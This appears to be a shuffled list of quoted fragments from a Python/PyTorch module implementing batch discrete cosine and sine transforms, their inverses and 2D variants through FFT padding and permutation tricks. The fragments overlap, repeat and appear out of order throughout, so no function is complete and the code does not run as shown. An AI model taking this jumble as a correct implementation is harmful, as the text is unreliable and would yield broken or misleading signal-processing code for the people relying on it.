onesided=True)[..., 1:N+1, :] if expkp1", "* (sin(a+b) + sin(a-b)) cos(a) sin(b) = 1/2 * (sin(a-b)", "\"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None,", "@param expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2,", "Discrete Cosine-Cosine Transformation without normalization to coefficients. It computes following", "last dimension, excluding the complex number dimension x_pad = F.pad(x_pad,", "size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] = x", "2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients. It", "padding trick to solve DCT with FFT in the following", "x by zeros 3. Perform IFFT 4. Extract the real", "by zeros 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4.", "Inverse Discrete Cosine-Sine Transformation without normalization to coefficients. It computes", "DCT with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad", "\"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x, expkp1_0=None,", "= x.size(-1) if perm is None: perm = get_perm(N, dtype=torch.int64,", "x batch tensor, the 2D part is MxN @param expk0", "because complex numbers introduce a new dimension y = torch.rfft(x_pad,", "spectral transformation leveraging fast fourier transform engine. The math here", "is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make later multiplication easier. \"\"\"", "# @date Jun 2018 # import os import sys import", "expk = get_expk(N, dtype=x.dtype, device=x.device) # get real part y.mul_(expk)", "device=x.device) # get real part y.mul_(expk) # I found add", "to coefficients. Compute 1D DCT twice. @param x batch tensor,", "len(x.size()) == 1: y.squeeze_(0) return y def dct2_2N(x, expk0=None, expk1=None):", "exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N))", "1/2 * (cos(a-b) - cos(a+b)) cos(a) cos(b) = 1/2 *", "normalization to coefficients. Compute 1D DCT twice. @param x batch", "x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding trick to solve DCT", "equation, which is slightly different from standard DCT formulation. y_{u,", "\\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick to solve", "0]+y[..., 1] def idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete Cosine", "device=device) return perm def dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine", "1: x_pad.unsqueeze_(0) # the last dimension here becomes -2 because", "\"\"\" Batch Discrete Sine Transformation without normalization to coefficients. Compute", "q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DST and then 1D DCT.", "4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm", "onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return", "expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Cosine Transformation without", "-2, dtype=dtype, device=device) return perm def dct_2N(x, expk=None): \"\"\" Batch", "\\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting trick to solve", "expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0,", "y.mul_(expk) # I found add is much faster than sum", "# this is to match idct_2N # normal way should", "MxN @param perm0 with length M @param expk0 with length", "[a, c, e, f, d, b] 2. Perform FFT 3.", "get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j", "device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) # pad", "len(x.size()) == 1: y.squeeze_(0) return y def idxt(x, cos_or_sin_flag, expk=None):", "2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1)", "= torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N, dtype, device):", "sin(-2*pi*(u*i/M + v*j/N))). By mapping the original image from (i,", "v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i", "be easier for multiplication expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2)", "0].mul(expkp1[:, 1]) return y def idst(x, expkp1=None): \"\"\" Batch Inverse", "real part \"\"\" # last dimension N = x.size(-1) if", "# multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) # pad second", "twice. \"\"\" def get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but", "expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete", "as np import torch import torch.nn.functional as F import pdb", "multiplication expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def", "be easier for multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2)", "dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete", "length M @param perm1 with length N @param expk1 with", "1, expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D", "dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N)", "1] def dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete Cosine Transformation", "Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding", "dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None,", "the 2N padding trick to solve IDCT with IFFT in", "Discrete Cosine Transformation without normalization to coefficients. Compute y_u =", "sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def idct_2N(x,", "cos(pi*(2i+1)*u/(2N)), Impelements the N permuting trick to solve DCT with", "expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch", "dim=-1) return expk.contiguous() def get_perm(N, dtype, device): \"\"\" Compute permutation", "Cosine Transformation without normalization to coefficients. Compute y_u = \\sum_i", "expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0,", "inside exp. This will enable us to derive various cos/sin", "= 1/2 * (sin(a+b) + sin(a-b)) cos(a) sin(b) = 1/2", "length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), expk_0).transpose_(dim0=-2,", "idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idcst2(x, expk_0=None,", "will enable us to derive various cos/sin transformation by computing", "== 1: y.squeeze_(0) return y def idct_N(x, expk=None): N =", "Impelements the 2N padding trick to solve DCT with FFT", "2D part is MxN @param expkp1_0 with length M @param", "dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same.", "M @param expk1 with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1),", "torch.empty_like(x) z[..., 0:N:2] = y[..., :(N+1)//2, 0] z[..., 1:N:2] =", "expk=None): N = x.size(-1) if expk is None: expk =", "trigonometric identities exploited by prosthaphaeresis relate products of trigonometric functions", "= \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT", "expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation without normalization", "link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros 2. Perform FFT", "\\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param", "@param x batch tensor, the 2D part is MxN @param", "2D FFT performs y_{u, v} = \\sum_i \\sum_j x_{i, j}", "cos_or_sin_flag 0 for cosine tranformation and 1 or sine transformation", "easier for multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return", "zeros 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract", "expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Cosine-Sine Transformation without", "# @file discrete_spectral_transform.py # @author <NAME> # @date Jun 2018", "y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if", "(u*i/M - v*j/N) inside exp. This will enable us to", "dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:]", "with length M @param expkp1_1 with length N \"\"\" return", "= y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1]) return y", "= torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size())", "idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2,", "signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size()) == 1:", "Prosthaphaeresis properties. The trigonometric identities exploited by prosthaphaeresis relate products", "get imag part y = y[..., 1].mul(expkp1[:, 0]) - y[...,", "2*(N//2)-3, ..., 3, 1 \"\"\" perm = torch.zeros(N, dtype=dtype, device=device)", "-sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N,", "add is much faster than sum #y = y.sum(dim=-1) return", "IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N))", "same. The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N =", "fourier transform engine. The math here mainly uses Prosthaphaeresis properties.", "expk 2*exp(j*pi*k/(2N)) \"\"\" # last dimension N = x.size(-1) if", "''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x,", "2N padding trick to solve DCT with FFT in the", "# last dimension N = x.size(-1) if perm is None:", "tensor, the 2D part is MxN @param expk0 with length", "cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then 1D DST. @param", "\\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DST and then", "because complex numbers introduce a new dimension # Must use", "length M @param expk0 with length M @param perm1 with", "# cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous()", "perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation", "3, 1 \"\"\" perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] =", "multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) # pad second last", "without normalization to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)),", "2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients. Compute", "@file discrete_spectral_transform.py # @author <NAME> # @date Jun 2018 #", "FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such", "= F.pad(x, (0, N), 'constant', 0) # the last dimension", "torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] = x x_reorder[..., 1:, 1]", "get_expkp1(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1)", "later multiplication easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N))", "(0, N), 'constant', 0) # the last dimension here becomes", "2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)", "expk_1=None): \"\"\" Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization", "expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Sine Transformation without", "= 1/2 * (cos(a-b) - cos(a+b)) cos(a) cos(b) = 1/2", "in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such that", "N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype,", "device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) # pad", "2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make later multiplication easier. \"\"\" pik_by_2N", "but not exactly the same. The actual return is 2*cos(pi*u/(2N)),", "real part \"\"\" # last dimension N = x.size(-1) #", "dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype,", "get_expk(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk)", "zeros 3. Perform IFFT 4. Extract the real part @param", "0, expk_1) def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse", "# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def", "M @param expk1 with length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1),", "length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def", "perm=perm1, expk=expk1) def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete", "DST. @param x batch tensor, the 2D part is MxN", "1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this", "y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if", "normalization to coefficients. It computes following equation, which is slightly", "= x_reorder.index_select(dim=-2, index=perm) # switch back x_reorder.transpose_(dim0=-2, dim1=-1) y =", "2D Discrete Cosine Transformation without normalization to coefficients. Compute 1D", "expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1),", "imag part y = y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:,", "def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Cosine", "y = y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1]) return", "dtype=x.dtype, device=x.device) # get imag part y = y[..., 1].mul(expkp1[:,", "not exactly the same. The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N))", "dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch", "j) to (i, N-j), we can have (u*i/M - v*j/N)", "device=x.device) # get imag part y = y[..., 1].mul(expkp1[:, 0])", "def idct2_N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation", "\\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and", "d, e, f] becomes [a, c, e, f, d, b]", "IFFT here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N)", "not exactly the same. The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)).", "Transformation without normalization to coefficients. Compute idxst(idct(x)) @param x batch", "expk.contiguous() def get_expkp1(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not", "twice. @param x batch tensor, the 2D part is MxN", "dtype=x.dtype, device=x.device) # get real part y.mul_(expk) # I found", "2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients. Compute", "second last dimension, excluding the complex number dimension x_pad =", "x_reorder[..., 0] = x x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1)", "device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I swap -cos and", "N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x,", "part y = y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1])", "x_pad = F.pad(x, (0, N), 'constant', 0) # the last", "device=x.device) if x.ndimension() <= 1: x_reorder = x.view([1, N]) else:", "as F import pdb \"\"\" Discrete spectral transformation leveraging fast", "from (i, j) to (i, N-j), we can have (u*i/M", "idct_N(x, expk=None): N = x.size(-1) if expk is None: expk", "length N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1,", "x by zeros 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N))", "the complex number dimension x_pad = F.pad(x_pad, (0, 0, 0,", "= x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[...,", "1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1),", "@param expk1 with length N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0,", "return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None,", "A 2D FFT performs y_{u, v} = \\sum_i \\sum_j x_{i,", "tensor, the 2D part is MxN @param perm0 with length", "last dimension N = x.size(-1) if perm is None: perm", "= torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I", "number dimension x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant',", "dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) #", "idct2_N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without", "= torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return perm def dct_2N(x,", "torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return perm def dct_2N(x, expk=None):", "idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None):", "torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk is", "to (i, N-j), we can have (u*i/M - v*j/N) inside", "part is MxN @param expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param", "= torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_exact_expk(N, dtype,", "length N @param expk1 with length N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2,", "j sin(-2*pi*(u*i/M + v*j/N))). By mapping the original image from", "# @author <NAME> # @date Jun 2018 # import os", "is None: perm = get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <=", "with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1),", "then 1D DCT. @param x batch tensor, the 2D part", "cos(b) = 1/2 * (sin(a+b) + sin(a-b)) cos(a) sin(b) =", "expk.mul_(2) return expk.contiguous() def get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N))", "= get_expk(N, dtype=x.dtype, device=x.device) # get real part y.mul_(expk) #", "torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :] if expkp1 is None:", "and sin because we need the imag part # this", "3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract the real part \"\"\"", "dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x, expk0=None, expk1=None):", "\"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def", "DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5))", "conversion @param cos_or_sin_flag 0 for cosine tranformation and 1 or", "expk1 with length N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2,", "return y def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse Discrete", "y.mul_(1.0/N) if expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device)", "y[..., 0]+y[..., 1] def idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete", "perm1 with length N @param expk1 with length N \"\"\"", "device): \"\"\" Compute permutation to generate following array 0, 2,", "x x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] =", "batch tensor, the 2D part is MxN @param expkp1_0 with", "= x.clone() # switch from row-major to column-major for speedup", "This will enable us to derive various cos/sin transformation by", "1D DCT twice. @param x batch tensor, the 2D part", "F.pad(x_pad, (0, 0, 0, N), 'constant', 0) if len(x.size()) ==", "return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None):", "expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2,", "* sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos,", "transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\" # last dimension N =", "@param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1,", "= y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1])", "\"\"\" # last dimension N = x.size(-1) if expkp1 is", "with length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1,", ":] y.mul_(1.0/N) if expk is None: expk = get_expk(N, dtype=x.dtype,", "with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)", "length N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def", "1]) return y def idst(x, expkp1=None): \"\"\" Batch Inverse Discrete", "2D Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients. It", "cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def", "length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def", "list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] =", "dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idsct2(x, expk_0=None, expk_1=None):", "N @param expk1 with length N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1),", "expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without normalization", "exactly the same. The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This", "last dimension N = x.size(-1) # pad last dimension x_pad", "DST and then 1D DCT. @param x batch tensor, the", "(sin(a-b) - sin(a+b)) A 2D FFT performs y_{u, v} =", "dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without", "\"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin", "\"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) #", "y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1]) return y def", "x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DST and then 1D", "\"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same. The actual", "the original image from (i, j) to (i, N-j), we", "return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None,", "I swap -cos and sin because we need the imag", "with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x", "= 1/2 * (sin(a-b) - sin(a+b)) A 2D FFT performs", "This will make later multiplication easier. \"\"\" pik_by_2N = torch.arange(N,", "DCT and then 1D DST. @param x batch tensor, the", "\\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DST and", "\"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin,", "for conversion @param cos_or_sin_flag 0 for cosine tranformation and 1", "Perform IFFT 4. Extract the real part \"\"\" # last", "= x.size(-1) if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype,", "dimension N = x.size(-1) if expk is None: expk =", "= \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) + j", "padding trick to solve IDCT with IFFT in the following", "1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None):", "2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract the", "this will be easier for multiplication expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()],", "def idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without", "idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without", "normalization to coefficients. Compute idct(idxst(x)). @param x batch tensor, the", "return y def idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine", "# switch from row-major to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1)", "part is MxN @param perm0 with length M @param expk0", "link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x by", "y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def idxt(x,", "x.size(-1) if expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device)", "\"\"\" def get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not", "cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b)) A 2D", "x_pad.unsqueeze_(0) # the last dimension here becomes -2 because complex", "def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D Discrete", "0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y", "expk = get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2) x_reorder", "functions to sums. sin(a) sin(b) = 1/2 * (cos(a-b) -", "have (u*i/M - v*j/N) inside exp. This will enable us", "dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x, expk0=None,", "the real part requires subtraction # this will be easier", "def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation", "expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without normalization to", "is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply by", "complex number dimension x_pad = F.pad(x_pad, (0, 0, 0, N),", "q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then 1D DST.", "perm1=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation without normalization", "Inverse Discrete Sine-Cosine Transformation without normalization to coefficients. Compute idxst(idct(x))", "length M @param expk1 with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2,", "Cosine Transformation without normalization to coefficients. Compute 1D DCT twice.", "N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2,", "the real part @param x batch 1D tensor for conversion", "x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] = x x_reorder[...,", "else: x_reorder = x.clone() # switch from row-major to column-major", "dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I swap -cos", "The math here mainly uses Prosthaphaeresis properties. The trigonometric identities", "z def dst(x, expkp1=None): 